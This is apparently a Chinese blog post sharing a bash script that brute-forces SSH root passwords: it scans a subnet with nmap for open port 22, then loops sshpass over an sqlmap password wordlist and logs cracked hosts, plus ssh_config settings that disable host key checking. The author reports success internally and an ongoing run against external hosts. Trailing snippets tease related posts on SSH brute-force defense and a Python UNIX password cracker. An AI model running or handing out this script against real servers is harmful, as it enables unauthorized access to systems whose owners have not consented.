暴力破解指令碼 shell

2021-07-26 04:39:51 字數 968 閱讀 5639

突然間懵生了乙個想法 然後就做了(第一次覺得工作這麼有趣!!!) 內網已經測試能夠成功 外網正在測試,字典比較大估計要跑好幾天

先把指令碼貼出來:

#!bin/bash

gateway=172.16.80

#nmap -p 22 172.16.81.* |grep open -a3 |grep for|cut -d " " -f5 >hosts

hosts=`cat hosts`

pass=`cat wordlist.txt`

#sshpass -p "yuan" ssh [email protected] "ls"

#[ $? == 0 ] && echo "the server is ok "

for i in $hosts; do

echo "正在準備請稍後"

for p in $pass; do

echo "server is $i passwd is $p"

sshpass -p "$p" ssh root@$i "ls"

[ $? == 0 ] && echo "這台server $i已經破解 $p" >>server 2>&1

done

done

hosts 是通過nmap 掃瞄出來22埠為開啟狀態的主機

wordlist.txt 是sqlmap自帶的暴力破解字典 大概11m左右

ssh_config 新增配置:

stricthostkeychecking no

compression yes

serveraliveinterval 60

serveralivecountmax 5

controlmaster auto

controlpath ~/.ssh/sockets/%r@%h-%p

controlpersist 4h

用SHELL指令碼來防SSH暴力破解

由於機器已經在跑重要的業務,我又不想去公升級核心,免得影響正常的 運營,所以iptables的想法暫時告一段落 後來我又想到用hostsdeny的方法來解決這個問題,感覺這個方法還是比較繁瑣,還不如自己手動寫指令碼來解決這個麻煩,指令碼內容如下 bin bash cat var log secure...

用SHELL指令碼來防SSH暴力破解

由於機器已經在跑重要的業務,我又不想去公升級核心,免得影響正常的 運營,所以iptables的想法暫時告一段落 後來我又想到用hostsdeny的方法來解決這個問題,感覺這個方法還是比較繁瑣,還不如自己手動寫指令碼來解決這個麻煩,指令碼內容如下 bin bash cat var log secure...

Python 暴力破解UNIX密碼指令碼

coding utf 8 暴力破解unix的密碼,需要輸入字典檔案和unix的密碼檔案 遍歷整個字典,試圖用常用的鹽值來匹配破解雜湊密碼 import crypt def testpass cryptpass salt cryptpass 0 2 dictfile open dictionary.t...